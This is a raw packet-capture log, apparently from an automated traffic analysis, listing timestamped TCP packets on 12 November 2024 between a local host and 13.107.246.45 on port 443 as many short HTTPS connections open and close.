                                  Nov 12, 2024 16:42:14.605592012 CET4434981913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.605602026 CET49819443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.605606079 CET4434981913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.607353926 CET49827443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.607367992 CET4434982713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.607429981 CET49827443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.607533932 CET49827443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.607543945 CET4434982713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.828142881 CET4434982313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.828569889 CET49823443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.828583002 CET4434982313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.828974962 CET49823443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.828980923 CET4434982313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.919625998 CET4434982513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.919949055 CET49825443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.919961929 CET4434982513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.920375109 CET49825443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.920378923 CET4434982513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.969464064 CET4434982313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.969507933 CET4434982313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.969579935 CET49823443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.969707012 CET49823443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.969713926 CET4434982313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.969733000 CET49823443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.969737053 CET4434982313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.972227097 CET49828443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.972271919 CET4434982813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.972326040 CET49828443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.972476006 CET49828443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.972491980 CET4434982813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.196625948 CET4434982513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.197288990 CET4434982513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.197448969 CET49825443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.197514057 CET49825443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.197521925 CET4434982513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.197534084 CET49825443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.197539091 CET4434982513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.200109959 CET49829443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.200133085 CET4434982913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.200299978 CET49829443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.200447083 CET49829443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.200458050 CET4434982913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.296235085 CET4434982613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.296638966 CET49826443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.296653986 CET4434982613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.297080994 CET49826443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.297086000 CET4434982613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.338234901 CET4434982713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.338535070 CET49827443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.338548899 CET4434982713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.338896990 CET49827443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.338901043 CET4434982713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.428864002 CET4434982613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.429192066 CET4434982613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.429239988 CET49826443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.429267883 CET49826443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.429286957 CET4434982613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.429296017 CET49826443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.429301977 CET4434982613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.431329012 CET49830443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.431355953 CET4434983013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.431583881 CET49830443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.431719065 CET49830443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.431732893 CET4434983013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.466976881 CET4434982713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.467041969 CET4434982713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.467086077 CET49827443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.467190981 CET49827443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.467197895 CET4434982713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.467209101 CET49827443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.467214108 CET4434982713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.469428062 CET49831443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.469448090 CET4434983113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.469508886 CET49831443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.469630957 CET49831443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.469640970 CET4434983113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.711080074 CET4434982813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.711520910 CET49828443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.711536884 CET4434982813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.711968899 CET49828443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.711973906 CET4434982813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.846801996 CET4434982813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.846867085 CET4434982813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.847019911 CET49828443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.847156048 CET49828443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.847171068 CET4434982813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.847218990 CET49828443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.847225904 CET4434982813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.849621058 CET49832443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.849663973 CET4434983213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.849787951 CET49832443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.849859953 CET49832443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.849874973 CET4434983213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.930985928 CET4434982913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.931579113 CET49829443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.931588888 CET4434982913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:15.931804895 CET49829443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:15.931809902 CET4434982913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.068221092 CET4434982913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.068264961 CET4434982913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.068495035 CET49829443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.068495035 CET49829443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.068659067 CET49829443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.068666935 CET4434982913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.070466995 CET49833443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.070487976 CET4434983313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.070641041 CET49833443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.070664883 CET49833443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.070669889 CET4434983313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.162569046 CET4434983013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.162957907 CET49830443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.162976980 CET4434983013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.164221048 CET49830443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.164227009 CET4434983013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.218168020 CET4434983113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.218822956 CET49831443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.218822956 CET49831443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.218837023 CET4434983113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.218849897 CET4434983113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.293756008 CET4434983013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.293836117 CET4434983013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.294034958 CET49830443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.294034958 CET49830443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.294136047 CET49830443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.294148922 CET4434983013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.296272993 CET49834443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.296309948 CET4434983413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.296421051 CET49834443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.296503067 CET49834443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.296516895 CET4434983413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.349260092 CET4434983113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.349384069 CET4434983113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.349467039 CET49831443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.349467039 CET49831443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.349673986 CET49831443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.349680901 CET4434983113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.351286888 CET49835443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.351300001 CET4434983513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.351447105 CET49835443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.351447105 CET49835443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.351464987 CET4434983513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.619515896 CET4434983213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.619884968 CET49832443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.619906902 CET4434983213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.620270014 CET49832443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.620275021 CET4434983213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.774785995 CET4434983213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.774831057 CET4434983213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.774888039 CET49832443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.775034904 CET49832443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.775049925 CET4434983213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.775064945 CET49832443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.775068998 CET4434983213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.777475119 CET49836443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.777496099 CET4434983613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.777559042 CET49836443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.777693987 CET49836443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.777704000 CET4434983613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.808554888 CET4434983313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.808866978 CET49833443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.808876991 CET4434983313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.809227943 CET49833443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.809231997 CET4434983313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.940331936 CET4434983313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.940566063 CET4434983313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.940613031 CET49833443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.940771103 CET49833443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.940778017 CET4434983313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.940826893 CET49833443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.940834999 CET4434983313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.943212986 CET49837443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.943231106 CET4434983713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:16.943293095 CET49837443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.943582058 CET49837443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:16.943592072 CET4434983713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.072293997 CET4434983513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.072894096 CET49835443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.072906971 CET4434983513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.073693991 CET49835443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.073698044 CET4434983513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.082818985 CET4434983413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.083152056 CET49834443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.083174944 CET4434983413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.084126949 CET49834443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.084132910 CET4434983413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.203789949 CET4434983513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.203835964 CET4434983513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.203918934 CET49835443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.218597889 CET4434983413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.218677998 CET4434983413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.218750000 CET49834443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.219784975 CET49835443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.219791889 CET4434983513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.220006943 CET49834443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.220027924 CET4434983413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.229722977 CET49838443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.229743958 CET4434983813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.229990959 CET49838443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.230421066 CET49838443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.230431080 CET4434983813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.231471062 CET49839443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.231481075 CET4434983913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.231591940 CET49839443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.231807947 CET49839443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.231817961 CET4434983913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.524642944 CET4434983613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.549676895 CET49836443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.549690962 CET4434983613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.550374985 CET49836443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.550379038 CET4434983613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.675570965 CET4434983613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.675651073 CET4434983613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.675695896 CET49836443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.676012039 CET49836443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.676019907 CET4434983613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.676033020 CET49836443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.676037073 CET4434983613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.679742098 CET49840443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.679759026 CET4434984013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.679928064 CET49840443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.680326939 CET49840443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.680336952 CET4434984013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.962598085 CET4434983813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.963099957 CET49838443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.963109016 CET4434983813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.963485956 CET49838443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.963490009 CET4434983813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.966248989 CET4434983913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.966537952 CET49839443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.966552973 CET4434983913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:17.966857910 CET49839443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:17.966861963 CET4434983913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.092261076 CET4434983813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.092315912 CET4434983813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.092371941 CET49838443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.092519045 CET49838443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.092524052 CET4434983813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.092557907 CET49838443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.092561960 CET4434983813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.094851017 CET49841443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.094892979 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.094980955 CET49841443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.095128059 CET49841443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.095141888 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.098059893 CET4434983913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.098102093 CET4434983913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.098151922 CET49839443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.098247051 CET49839443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.098253965 CET4434983913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.098264933 CET49839443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.098268986 CET4434983913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.100047112 CET49842443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.100060940 CET4434984213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.100234032 CET49842443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.100347042 CET49842443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.100356102 CET4434984213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.413907051 CET4434984013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.414602995 CET49840443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.414612055 CET4434984013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.416210890 CET49840443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.416214943 CET4434984013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.547300100 CET4434984013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.547347069 CET4434984013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.547547102 CET49840443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.547991037 CET49840443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.547997952 CET4434984013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.548008919 CET49840443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.548012972 CET4434984013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.551578999 CET49843443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.551620960 CET4434984313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.551824093 CET49843443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.552078009 CET49843443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.552094936 CET4434984313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.814970970 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.815522909 CET49841443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.815538883 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.816210985 CET49841443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.816216946 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.833015919 CET4434984213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.845041037 CET49842443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.845041037 CET49842443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.845052004 CET4434984213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.845066071 CET4434984213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.920428991 CET4434983713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.943449974 CET49837443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.943461895 CET4434983713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.944130898 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.944149971 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.944186926 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.944211960 CET49837443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.944216967 CET4434983713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.944241047 CET49841443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.944264889 CET49841443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.944639921 CET49841443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.944639921 CET49841443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.944658041 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.944668055 CET4434984113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.984478951 CET49844443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.984498024 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:18.984622002 CET49844443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.990991116 CET49844443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:18.991002083 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.030430079 CET4434984213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.030474901 CET4434984213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.030616999 CET49842443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.030776978 CET49842443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.030787945 CET4434984213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.030817032 CET49842443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.030822039 CET4434984213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.034821033 CET49845443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.034846067 CET4434984513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.035109997 CET49845443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.035453081 CET49845443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.035464048 CET4434984513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.074856997 CET4434983713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.075000048 CET4434983713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.075169086 CET49837443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.075526953 CET49837443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.075539112 CET4434983713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.075567961 CET49837443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.075572014 CET4434983713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.078687906 CET49846443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.078700066 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.078846931 CET49846443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.079114914 CET49846443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.079125881 CET4434984613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.280474901 CET4434984313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.281167984 CET49843443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.281188011 CET4434984313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.281675100 CET49843443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.281681061 CET4434984313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.409704924 CET4434984313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.409760952 CET4434984313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.409951925 CET49843443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.409951925 CET49843443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.410036087 CET49843443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.410046101 CET4434984313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.412411928 CET49847443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.412436008 CET4434984713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.412519932 CET49847443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.412658930 CET49847443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.412671089 CET4434984713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.730855942 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.731393099 CET49844443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.731409073 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.732306957 CET49844443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.732311964 CET4434984413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.787203074 CET4434984513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.787507057 CET49845443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.787518978 CET4434984513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:19.788079977 CET49845443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:19.788084030 CET4434984513.107.246.45192.168.2.4
